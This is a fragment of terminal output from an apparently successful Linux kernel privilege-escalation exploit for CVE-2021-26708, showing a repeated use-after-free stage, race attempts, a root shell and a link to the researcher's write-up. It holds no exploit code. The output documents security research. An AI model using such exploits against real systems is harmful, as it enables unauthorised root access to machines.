[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30
[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
==Reference==
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html












